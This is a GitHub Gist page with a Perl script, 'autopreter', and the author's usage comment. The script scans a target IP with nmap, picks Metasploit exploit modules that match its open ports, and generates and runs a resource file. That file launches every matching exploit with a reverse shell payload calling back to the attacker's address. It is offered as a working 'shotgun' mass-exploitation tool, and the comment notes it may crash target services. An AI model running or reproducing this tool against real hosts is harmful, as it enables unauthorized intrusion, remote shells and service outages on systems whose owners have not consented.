Last active
November 24, 2020 17:18
-
-
Save oxagast/a6c340cf4e8b844af490cd678563611a to your computer and use it in GitHub Desktop.
Automatically generate a custom metasploit.rc resource targeted at an address.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| use strict; | |
| use Cwd qw(); | |
| my $path = Cwd::cwd(); | |
| if ( $path !~ m/metasploit/ ) { | |
| print("err: Your current working directory must be metasploit's.\n"); | |
| exit(1); | |
| } | |
| print("autopreter by oxagast\n"); | |
| if ( $#ARGV < 1 ) { | |
| print("Useage: ./autopreter.pl <remoteip> <yourip>\n\n"); | |
| print(" If you can't get a shell, your firewall may be blocking it\n"); | |
| print(" Please allow 15 minutes for the process to complete...\n"); | |
| print(" Once sessions are displayed, if you have an active session\n"); | |
| print(" type sessions 1\n"); | |
| exit(1); | |
| } | |
| #if(`id` !~ m/root/) { | |
| # print("err: Must be run as root on the local machine.\n"); | |
| # exit(1); | |
| #} | |
| my $lhost = $ARGV[1]; | |
| my $rhost = $ARGV[0]; | |
| my $pid = $$; | |
| print("Trying to spawn a shell from $rhost...\n"); | |
| print("Scanning $rhost for open ports...\n"); | |
| system("nmap $rhost -oG masspwn.$pid.nmap >/dev/null"); | |
| my $nms = `cat masspwn.$pid.nmap`; | |
| my @nmap; | |
| @nmap = split( "\n", $nms ); | |
| @nmap[1] =~ m/Host: (\d+\.\d+\.\d+\.\d+)/; | |
| $rhost = $1; | |
| my @port; | |
| my @nport; | |
| my @modules; | |
| @port = split( "/open", @nmap[2] ); | |
| @port[0] =~ s/.*Ports: //; | |
| push( @nport, @port[0] ); | |
| foreach (@port) { | |
| $_ =~ m/.*, (\d+)/; | |
| push( @nport, $1 ); | |
| } | |
| if ( scalar(@nport) - 1 >= 1 ) { | |
| foreach (@nport) { | |
| my $curport = $_; | |
| my @moduledir = | |
| `grep RPORT modules/ -R | grep \\($curport\\) | grep exploit`; | |
| foreach (@moduledir) { | |
| my $curmod = $_; | |
| if ( ( $curmod !~ m/chain_reply/ ) && ( $curmod !~ m/trans2open/ ) ) | |
| { | |
| $curmod =~ m/.*\/(exploit.*)\.rb\:.*/; | |
| push( @modules, $1 ); | |
| } | |
| } | |
| } | |
| my @umods; | |
| my %seen; | |
| foreach my $value (@modules) { | |
| if ( !$seen{$value} ) { | |
| push @umods, $value; | |
| $seen{$value} = 1; | |
| } | |
| } | |
| #@nmap[2] =~ m/.*OS: (\w+) /; | |
| #my $os = $1; | |
| #my $los = lc($os); | |
| my $handler = 2000; | |
| my $fh; | |
| my $putdown = 0; | |
| print "Generating the resource script...\n"; | |
| open( $fh, ">", "masspwn.$pid.msf" ); | |
| foreach (@umods) { | |
| print( $fh "use $_\n" ); | |
| print( $fh "set RHOST $rhost\n" ); | |
| print( $fh "set LHOST $lhost\n" ); | |
| print( $fh "set LPORT $handler\n" ); | |
| print( $fh "set ExitOnSession false\n" ); | |
| print( $fh "set PAYLOAD generic_shell_reverse\n" ); | |
| print( $fh "exploit -j -z\n" ); | |
| print( $fh "back\n" ); | |
| $handler++; | |
| $putdown = 1; | |
| } | |
| if ( $putdown == 1 ) { | |
| print( $fh "jobs -K\n" ); | |
| print( $fh "sleep 15\n" ); | |
| print( $fh "sessions\n" ); | |
| print "Trying to pop a shell...\n"; | |
| system("./msfconsole -r masspwn.$pid.msf"); | |
| } | |
| else { | |
| $putdown = 0; | |
| print "No open ports, won't be exploited.\n"; | |
| } | |
| } | |
| unlink("masspwn.$pid.msf"); | |
| unlink("masspwn.$pid.nmap"); | |
| exit(0); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This seems to be working after commit a few min ago. Tries to use a shotgun approach towards exploitation, utilizing Metasploit modules on the backend. Must be run from the metasploit-framework directory. Allow up to 15 minutes for the process to complete. If you kill Metasploit after you get a shell session but before it completes you may have lost your chance at a shell (many exploits crash the service they exploit after they're done).